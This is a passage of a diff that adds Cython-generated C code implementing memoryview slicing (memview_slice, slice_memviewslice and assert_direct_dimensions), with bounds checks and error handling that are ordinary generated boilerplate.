if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + } + } + + /* "View.MemoryView":704 + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.assert_direct_dimensions", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *__pyx_v_memview, PyObject *__pyx_v_indices) { + int __pyx_v_new_ndim; + int __pyx_v_suboffset_dim; + int __pyx_v_dim; + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + __Pyx_memviewslice *__pyx_v_p_src; + struct __pyx_memoryviewslice_obj *__pyx_v_memviewsliceobj = 0; + __Pyx_memviewslice *__pyx_v_p_dst; + int *__pyx_v_p_suboffset_dim; + Py_ssize_t __pyx_v_start; + Py_ssize_t __pyx_v_stop; + Py_ssize_t __pyx_v_step; + Py_ssize_t __pyx_v_cindex; + int __pyx_v_have_start; + int __pyx_v_have_stop; + int __pyx_v_have_step; + PyObject *__pyx_v_index = NULL; + struct __pyx_memoryview_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + struct __pyx_memoryview_obj *__pyx_t_3; + char *__pyx_t_4; + int __pyx_t_5; + Py_ssize_t __pyx_t_6; + PyObject *(*__pyx_t_7)(PyObject *); + PyObject *__pyx_t_8 = NULL; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + Py_ssize_t __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memview_slice", 0); + + /* "View.MemoryView":712 + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): + * cdef int new_ndim = 0, suboffset_dim = -1, dim # <<<<<<<<<<<<<< + * cdef bint negative_step + * cdef __Pyx_memviewslice src, dst + */ + __pyx_v_new_ndim = 0; + __pyx_v_suboffset_dim = -1; + + /* "View.MemoryView":719 + * + * + * memset(&dst, 0, sizeof(dst)) # <<<<<<<<<<<<<< + * + * cdef _memoryviewslice memviewsliceobj + */ + (void)(memset((&__pyx_v_dst), 0, (sizeof(__pyx_v_dst)))); + + /* "View.MemoryView":723 + * cdef _memoryviewslice memviewsliceobj + * + * assert memview.view.ndim > 0 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_memview->view.ndim > 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 723, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 723, __pyx_L1_error) + #endif + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":726 + * + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview # <<<<<<<<<<<<<< + * p_src = &memviewsliceobj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 726, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_memviewsliceobj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":727 + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, &src) + */ + __pyx_v_p_src = (&__pyx_v_memviewsliceobj->from_slice); + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + goto __pyx_L3; + } + + /* "View.MemoryView":729 + * p_src = &memviewsliceobj.from_slice + * else: + * slice_copy(memview, &src) # <<<<<<<<<<<<<< + * p_src = &src + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_src)); + + /* "View.MemoryView":730 + * else: + * slice_copy(memview, &src) + * p_src = &src # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_p_src = (&__pyx_v_src); + } + __pyx_L3:; + + /* "View.MemoryView":736 + * + * + * dst.memview = p_src.memview # <<<<<<<<<<<<<< + * dst.data = p_src.data + * + */ + __pyx_t_3 = __pyx_v_p_src->memview; + __pyx_v_dst.memview = __pyx_t_3; + + /* "View.MemoryView":737 + * + * dst.memview = p_src.memview + * dst.data = p_src.data # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_v_p_src->data; + __pyx_v_dst.data = __pyx_t_4; + + /* "View.MemoryView":742 + * + * + * cdef __Pyx_memviewslice *p_dst = &dst # <<<<<<<<<<<<<< + * cdef int *p_suboffset_dim = &suboffset_dim + * cdef Py_ssize_t start, stop, step, cindex + */ + __pyx_v_p_dst = (&__pyx_v_dst); + + /* "View.MemoryView":743 + * + * cdef __Pyx_memviewslice *p_dst = &dst + * cdef int *p_suboffset_dim = &suboffset_dim # <<<<<<<<<<<<<< + * cdef Py_ssize_t start, stop, step, cindex + * cdef bint have_start, have_stop, have_step + */ + __pyx_v_p_suboffset_dim = (&__pyx_v_suboffset_dim); + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + __pyx_t_5 = 0; + if (likely(PyList_CheckExact(__pyx_v_indices)) || PyTuple_CheckExact(__pyx_v_indices)) { + __pyx_t_2 = __pyx_v_indices; __Pyx_INCREF(__pyx_t_2); __pyx_t_6 = 0; + __pyx_t_7 = NULL; + } else { + __pyx_t_6 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_indices); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 747, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_7)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_6 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } else { + if (__pyx_t_6 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } + } else { + __pyx_t_8 = __pyx_t_7(__pyx_t_2); + if (unlikely(!__pyx_t_8)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 747, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_8); + } + __Pyx_XDECREF_SET(__pyx_v_index, __pyx_t_8); + __pyx_t_8 = 0; + __pyx_v_dim = __pyx_t_5; + __pyx_t_5 = (__pyx_t_5 + 1); + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + __pyx_t_1 = (PyIndex_Check(__pyx_v_index) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":749 + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): + * cindex = index # <<<<<<<<<<<<<< + * slice_memviewslice( + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + */ + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_v_index); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 749, __pyx_L1_error) + __pyx_v_cindex = __pyx_t_9; + + /* "View.MemoryView":750 + * if PyIndex_Check(index): + * cindex = index + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_cindex, 0, 0, 0, 0, 0, 0); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 750, __pyx_L1_error) + + /* "View.MemoryView":748 + * + * for dim, index in enumerate(indices): + * if PyIndex_Check(index): # <<<<<<<<<<<<<< + * cindex = index + * slice_memviewslice( + */ + goto __pyx_L6; + } + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + __pyx_t_1 = (__pyx_v_index == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":757 + * False) + * elif index is None: + * p_dst.shape[new_ndim] = 1 # <<<<<<<<<<<<<< + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + */ + (__pyx_v_p_dst->shape[__pyx_v_new_ndim]) = 1; + + /* "View.MemoryView":758 + * elif index is None: + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 # <<<<<<<<<<<<<< + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 + */ + (__pyx_v_p_dst->strides[__pyx_v_new_ndim]) = 0; + + /* "View.MemoryView":759 + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 # <<<<<<<<<<<<<< + * new_ndim += 1 + * else: + */ + (__pyx_v_p_dst->suboffsets[__pyx_v_new_ndim]) = -1L; + + /* "View.MemoryView":760 + * p_dst.strides[new_ndim] = 0 + * p_dst.suboffsets[new_ndim] = -1 + * new_ndim += 1 # <<<<<<<<<<<<<< + * else: + * start = index.start or 0 + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + + /* "View.MemoryView":756 + * 0, 0, 0, # have_{start,stop,step} + * False) + * elif index is None: # <<<<<<<<<<<<<< + * p_dst.shape[new_ndim] = 1 + * p_dst.strides[new_ndim] = 0 + */ + goto __pyx_L6; + } + + /* "View.MemoryView":762 + * new_ndim += 1 + * else: + * start = index.start or 0 # <<<<<<<<<<<<<< + * stop = index.stop or 0 + * step = index.step or 0 + */ + /*else*/ { + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 762, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 762, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 762, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L7_bool_binop_done:; + __pyx_v_start = __pyx_t_9; + + /* "View.MemoryView":763 + * else: + * start = index.start or 0 + * stop = index.stop or 0 # <<<<<<<<<<<<<< + * step = index.step or 0 + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 763, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 763, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 763, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L9_bool_binop_done:; + __pyx_v_stop = __pyx_t_9; + + /* "View.MemoryView":764 + * start = index.start or 0 + * stop = index.stop or 0 + * step = index.step or 0 # <<<<<<<<<<<<<< + * + * have_start = index.start is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 764, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_8); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 764, __pyx_L1_error) + if (!__pyx_t_1) { + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } else { + __pyx_t_11 = __Pyx_PyIndex_AsSsize_t(__pyx_t_8); if (unlikely((__pyx_t_11 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 764, __pyx_L1_error) + __pyx_t_9 = __pyx_t_11; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L11_bool_binop_done; + } + __pyx_t_9 = 0; + __pyx_L11_bool_binop_done:; + __pyx_v_step = __pyx_t_9; + + /* "View.MemoryView":766 + * step = index.step or 0 + * + * have_start = index.start is not None # <<<<<<<<<<<<<< + * have_stop = index.stop is not None + * have_step = index.step is not None + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_start); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 766, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_start = __pyx_t_1; + + /* "View.MemoryView":767 + * + * have_start = index.start is not None + * have_stop = index.stop is not None # <<<<<<<<<<<<<< + * have_step = index.step is not None + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_stop); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 767, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_stop = __pyx_t_1; + + /* "View.MemoryView":768 + * have_start = index.start is not None + * have_stop = index.stop is not None + * have_step = index.step is not None # <<<<<<<<<<<<<< + * + * slice_memviewslice( + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_v_index, __pyx_n_s_step); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 768, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_1 = (__pyx_t_8 != Py_None); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_v_have_step = __pyx_t_1; + + /* "View.MemoryView":770 + * have_step = index.step is not None + * + * slice_memviewslice( # <<<<<<<<<<<<<< + * p_dst, p_src.shape[dim], p_src.strides[dim], p_src.suboffsets[dim], + * dim, new_ndim, p_suboffset_dim, + */ + __pyx_t_10 = __pyx_memoryview_slice_memviewslice(__pyx_v_p_dst, (__pyx_v_p_src->shape[__pyx_v_dim]), (__pyx_v_p_src->strides[__pyx_v_dim]), (__pyx_v_p_src->suboffsets[__pyx_v_dim]), __pyx_v_dim, __pyx_v_new_ndim, __pyx_v_p_suboffset_dim, __pyx_v_start, __pyx_v_stop, __pyx_v_step, __pyx_v_have_start, __pyx_v_have_stop, __pyx_v_have_step, 1); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(1, 770, __pyx_L1_error) + + /* "View.MemoryView":776 + * have_start, have_stop, have_step, + * True) + * new_ndim += 1 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + __pyx_v_new_ndim = (__pyx_v_new_ndim + 1); + } + __pyx_L6:; + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":780 + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, # <<<<<<<<<<<<<< + * memviewsliceobj.to_dtype_func, + * memview.dtype_is_object) + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 780, __pyx_L1_error) } + + /* "View.MemoryView":781 + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * else: + */ + if (unlikely(!__pyx_v_memviewsliceobj)) { __Pyx_RaiseUnboundLocalError("memviewsliceobj"); __PYX_ERR(1, 781, __pyx_L1_error) } + + /* "View.MemoryView":779 + * + * if isinstance(memview, _memoryviewslice): + * return memoryview_fromslice(dst, new_ndim, # <<<<<<<<<<<<<< + * memviewsliceobj.to_object_func, + * memviewsliceobj.to_dtype_func, + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, __pyx_v_memviewsliceobj->to_object_func, __pyx_v_memviewsliceobj->to_dtype_func, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 779, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 779, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":778 + * new_ndim += 1 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * return memoryview_fromslice(dst, new_ndim, + * memviewsliceobj.to_object_func, + */ + } + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + /*else*/ { + __Pyx_XDECREF((PyObject *)__pyx_r); + + /* "View.MemoryView":785 + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, + * memview.dtype_is_object) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_memoryview_fromslice(__pyx_v_dst, __pyx_v_new_ndim, NULL, NULL, __pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 784, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 784, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memview_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_memviewsliceobj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *__pyx_v_dst, Py_ssize_t __pyx_v_shape, Py_ssize_t __pyx_v_stride, Py_ssize_t __pyx_v_suboffset, int __pyx_v_dim, int __pyx_v_new_ndim, int *__pyx_v_suboffset_dim, Py_ssize_t __pyx_v_start, Py_ssize_t __pyx_v_stop, Py_ssize_t __pyx_v_step, int __pyx_v_have_start, int __pyx_v_have_stop, int __pyx_v_have_step, int __pyx_v_is_slice) { + Py_ssize_t __pyx_v_new_shape; + int __pyx_v_negative_step; + int __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + __pyx_t_1 = (!__pyx_v_is_slice); + if (__pyx_t_1) { + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + __pyx_t_1 = (__pyx_v_start < 0); + if (__pyx_t_1) { + + /* "View.MemoryView":816 + * + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + } + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + __pyx_t_1 = (0 <= __pyx_v_start); + if (__pyx_t_1) { + __pyx_t_1 = (__pyx_v_start < __pyx_v_shape); + } + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":818 + * start += shape + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 818, __pyx_L1_error) + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_have_step != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":822 + * + * if have_step: + * negative_step = step < 0 # <<<<<<<<<<<<<< + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + */ + __pyx_v_negative_step = (__pyx_v_step < 0); + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + __pyx_t_2 = (__pyx_v_step == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":824 + * negative_step = step < 0 + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * negative_step = False + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 824, __pyx_L1_error) + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":826 + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + * negative_step = False # <<<<<<<<<<<<<< + * step = 1 + * + */ + /*else*/ { + __pyx_v_negative_step = 0; + + /* "View.MemoryView":827 + * else: + * negative_step = False + * step = 1 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_step = 1; + } + __pyx_L6:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + __pyx_t_2 = (__pyx_v_have_start != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":832 + * if have_start: + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if start < 0: + * start = 0 + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":834 + * start += shape + * if start < 0: + * start = 0 # <<<<<<<<<<<<<< + * elif start >= shape: + * if negative_step: + */ + __pyx_v_start = 0; + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + } + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":835 + * if start < 0: 